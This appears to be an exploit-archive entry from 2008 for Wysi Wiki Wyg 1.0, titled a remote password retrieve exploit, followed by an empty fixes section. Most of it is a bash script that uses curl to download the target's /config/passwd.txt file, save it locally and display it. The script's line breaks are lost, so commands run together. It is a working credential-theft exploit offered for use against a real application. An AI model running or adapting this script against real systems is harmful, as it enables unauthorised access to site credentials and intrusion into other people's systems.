Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
2008-12-12 17:00:06#!/bin/bash# # by athos - staker[at]hotmail[dot]ithost=$1;name=$2;path='/config/passwd.txt';if [ "$name" = "" ]; then echo "Usage: bash $0 [host/path] [filename]"; echo "by athos - staker[at]hotmail[dot]it"; exit;fi; curl $host/$path > $name;clearcat $name;#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

